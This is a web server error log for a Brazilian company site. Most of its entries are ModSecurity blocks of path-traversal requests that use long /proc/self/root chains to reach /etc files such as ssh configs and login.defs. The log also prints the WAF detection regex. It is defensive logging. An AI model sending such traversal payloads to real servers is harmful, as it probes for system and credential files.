[Wed Mar 18 10:25:23.645351 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:46224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnw_u8EFLIOrSqIpsAvQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:25:23.749369 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:48170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnw-w_le52K8_3pV3b8AAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:25.077895 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:48176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnxcdf6f5d65gmYZTR9QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:26.156525 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:35504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnxuyqAr6etmhZHNq7ywAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:25:26.396066 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:48188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnxsdf6f5d65gmYZTR9wAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:27.715008 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:37876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnx9Y0UrI5A3LftIyjSQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:29.017361 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:37890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnyeyqAr6etmhZHNq7zQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:30.386178 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:37898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnyuoXxyEfFpUF8f9qQAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:32.154459 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:37912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqny-w_le52K8_3pV3b9gAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:34.026847 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:37924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnztY0UrI5A3LftIyjTgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:37.490274 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 57.141.18.84:45344] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:25:47.793773 2026] [mime_magic:error] [pid 30077:tid 140411708356352] (70014)End of file found: [client 57.141.18.36:46032] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:25:56.284712 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:35520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqn5AkwaGbbGflqUZAMnQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:26:05.025865 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:39616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqn7dY0UrI5A3LftIyjgAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:26:48.007900 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:50298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoGOoXxyEfFpUF8f9qqwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:27:01.274509 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:33008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoJUzinOy1jxa1j4cSFQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:15.113375 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:52330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoM-yqAr6etmhZHNq8NQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:16.765546 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:37970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoNNY0UrI5A3LftIyjtQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:34.030282 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:37978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoRuyqAr6etmhZHNq8SQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:41.905283 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:38130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoTcdf6f5d65gmYZTSXgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:43.278973 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:53712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoT9a6ubjKNq_cu4aWEQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:45.017950 2026] [mime_magic:error] [pid 19507:tid 140411599251200] (70014)End of file found: [client 57.141.18.71:50204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:27:47.598523 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:53726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoU9Y0UrI5A3LftIyj0gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:48.899290 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:53742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoVAkwaGbbGflqUZAM5wAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
